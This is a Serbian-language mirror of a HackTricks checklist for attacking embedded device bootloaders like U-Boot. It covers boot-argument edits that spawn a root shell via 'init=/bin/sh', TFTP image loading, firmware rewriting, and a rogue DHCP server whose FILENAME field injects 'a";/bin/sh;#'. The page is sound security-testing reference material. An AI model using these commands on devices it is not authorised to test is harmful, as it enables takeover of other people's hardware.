mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
2.4 KiB
2.4 KiB
{{#include ../../banners/hacktricks-training.md}}
Preporučeni koraci za modifikaciju konfiguracija pokretanja uređaja i bootloader-a kao što je U-boot:
- Pristupite Bootloader-ovom Interpreter Shell-u:
- Tokom pokretanja, pritisnite "0", razmak ili druge identifikovane "magične kodove" da biste pristupili bootloader-ovom interpreter shell-u.
- Modifikujte Boot Argumente:
- Izvršite sledeće komande da dodate '
init=/bin/sh' boot argumentima, omogućavajući izvršavanje shell komande: %%% #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash: rootfstype= hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot %%%
- Postavite TFTP Server:
- Konfigurišite TFTP server za učitavanje slika preko lokalne mreže: %%% #setenv ipaddr 192.168.2.2 #lokalna IP adresa uređaja #setenv serverip 192.168.2.1 #IP adresa TFTP servera #saveenv #reset #ping 192.168.2.1 #proverite pristup mreži #tftp ${loadaddr} uImage-3.6.35 #loadaddr uzima adresu za učitavanje fajla i ime slike na TFTP serveru %%%
- Iskoristite
ubootwrite.py:
- Koristite
ubootwrite.pyza pisanje U-boot slike i slanje modifikovanog firmvera za dobijanje root pristupa.
- Proverite Debug Funkcije:
- Proverite da li su debug funkcije kao što su detaljno logovanje, učitavanje proizvoljnih kernela ili pokretanje sa nepouzdanih izvora omogućene.
- Opasna Hardverska Interferencija:
- Budite oprezni prilikom povezivanja jednog pina na masu i interakcije sa SPI ili NAND flash čipovima tokom sekvence pokretanja uređaja, posebno pre nego što se kernel dekompresuje. Konsultujte tehnički list NAND flash čipa pre nego što kratko spojite pinove.
- Konfigurišite Rogue DHCP Server:
- Postavite rogue DHCP server sa zlonamernim parametrima za uređaj da bi ga usvojio tokom PXE pokretanja. Iskoristite alate kao što je Metasploit-ov (MSF) DHCP pomoćni server. Modifikujte 'FILENAME' parametar sa komandama za injekciju kao što su
'a";/bin/sh;#'da biste testirali validaciju unosa za procedure pokretanja uređaja.
Napomena: Koraci koji uključuju fizičku interakciju sa pinovima uređaja (*označeni zvezdicama) treba da se pristupaju sa ekstremnim oprezom kako bi se izbeglo oštećenje uređaja.
Reference
{{#include ../../banners/hacktricks-training.md}}